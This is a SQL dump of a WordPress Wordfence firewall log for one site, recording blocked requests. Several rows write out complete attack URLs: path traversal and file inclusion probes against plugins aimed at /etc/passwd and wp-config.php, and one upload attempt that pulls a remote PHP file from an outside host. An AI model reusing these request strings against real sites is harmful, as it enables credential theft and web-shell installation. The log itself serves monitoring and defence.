(5040, 1595365136.963676, 1595365136.932300, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlbmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lY29tbWVyY2Utc2hvcC1zdHlsaW5nL2luY2x1ZGVzL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5041, 1595365136.795726, 1595365136.761200, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlTmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYW5kaWRhdGUtYXBwbGljYXRpb24tZm9ybS9kb3dubG9hZHBkZmZpbGUucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5042, 1595365136.625196, 1595365136.602100, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'LFI: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8uL3NpbXBsZS1pbWFnZS1tYW5pcHVsYXRvci9jb250cm9sbGVyL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5043, 1595365136.466399, 1595365136.446000, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'LFI: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHRmLWltYWdlLWdhbGxlcnkvbGliLW1ib3gvYWpheF9sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5044, 1595365136.304850, 1595365136.241100, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/recent-backups/download-file.php?file_link=%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'LFI: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5045, 1595365136.104357, 1595365136.071000, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5046, 1595365135.807469, 1595365135.788700, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5047, 0.000000, 1595388977.871206, 0x00000000000000000000ffff23e44751, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://bodyandblast.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5048, 0.000000, 1595389370.183371, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5049, 0.000000, 1595389997.261648, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5050, 0.000000, 1595400362.358133, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://automobile-schiller.de/administrator/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5051, 1595402287.184216, 1595402287.060400, 0x00000000000000000000ffff52a576f9, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Slider Revolution: Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"60\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(5052, 0.000000, 1595406462.751874, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5053, 0.000000, 1595410695.710754, 0x00000000000000000000ffff23e41915, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://domkosmetykow.pl/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5054, 0.000000, 1595411596.694056, 0x00000000000000000000ffffb956a463, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5055, 0.000000, 1595411869.702984, 0x00000000000000000000ffffd1362fca, 0, 503, 0, 0, 0, 'http://www.ze-dent.com//wp-login.php', 'http://www.ze-dent.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5056, 0.000000, 1595424990.743354, 0x00000000000000000000ffffb956a464, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5057, 0.000000, 1595429761.377372, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5058, 0.000000, 1595435892.507121, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://vacationswithcharacter.com/blog/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5059, 0.000000, 1595442114.874415, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5060, 0.000000, 1595446911.407362, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://bmsfood.bg/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5061, 0.000000, 1595447607.707525, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5062, 0.000000, 1595460143.191288, 0x00000000000000000000ffffc3b00317, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5063, 0.000000, 1595460198.266939, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5064, 0.000000, 1595461119.236559, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.ahkraniosakral.dk/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5065, 0.000000, 1595468555.833842, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5066, 0.000000, 1595480324.031639, 0x00000000000000000000ffff23e41915, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://sbfirst.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5067, 1595493611.235943, 1595493611.112200, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fwww.relationshiptips.club%2Fcache%2Fdb.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'WP Mobile Detector <= 3.5 - Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"36\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVzaXplLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVzaXplLnBocA==\",\"category\":\"file_upload\",\"ssl\":0}'),
(5068, 1595493615.940936, 1595493615.913500, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlbmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lY29tbWVyY2Utc2hvcC1zdHlsaW5nL2luY2x1ZGVzL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5069, 1595493615.775861, 1595493615.752900, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlTmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYW5kaWRhdGUtYXBwbGljYXRpb24tZm9ybS9kb3dubG9hZHBkZmZpbGUucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5070, 1595493615.606756, 1595493615.579000, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'LFI: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8uL3NpbXBsZS1pbWFnZS1tYW5pcHVsYXRvci9jb250cm9sbGVyL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5071, 1595493615.430767, 1595493615.397200, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'LFI: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHRmLWltYWdlLWdhbGxlcnkvbGliLW1ib3gvYWpheF9sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5072, 1595493615.253178, 1595493615.213700, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/recent-backups/download-file.php?file_link=%2Fetc%2Fpasswd', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'LFI: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"13\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"L2V0Yy9wYXNzd2Q=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5073, 1595493615.072162, 1595493615.005100, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5074, 1595493614.733039, 1595493614.709900, 0x00000000000000000000ffff34f707de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5075, 0.000000, 1595502136.862776, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5076, 0.000000, 1595508228.518241, 0x00000000000000000000ffff23e44751, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://coastalpermafrost.org/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5077, 0.000000, 1595508885.165912, 0x00000000000000000000ffffb955ef6e, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5078, 0.000000, 1595520312.027088, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5079, 0.000000, 1595526575.984712, 0x00000000000000000000ffff330f9daa, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(5080, 0.000000, 1595528840.470084, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5081, 0.000000, 1595538730.813153, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5082, 0.000000, 1595546428.546470, 0x00000000000000000000ffff225a06c8, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://stroopz.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5083, 0.000000, 1595552256.011180, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5084, 0.000000, 1595553781.566669, 0x00000000000000000000ffff23e4d6bf, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://canfrancesc.cat/administrator/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5085, 0.000000, 1595556024.691066, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5086, 0.000000, 1595561794.643514, 0x00000000000000000000ffff6d466422, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5087, 0.000000, 1595566059.701717, 0x00000000000000000000ffff23f04289, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://valueguardinspections.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5088, 0.000000, 1595568390.093403, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5089, 0.000000, 1595578803.280971, 0x00000000000000000000ffff226b76da, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://archlinux.dk/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5090, 0.000000, 1595586306.368632, 0x00000000000000000000ffffb956a466, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5091, 0.000000, 1595595514.924701, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5092, 0.000000, 1595607913.993648, 0x00000000000000000000ffff23f04289, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://mdntr33.ru/administrator/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5093, 0.000000, 1595619675.554749, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
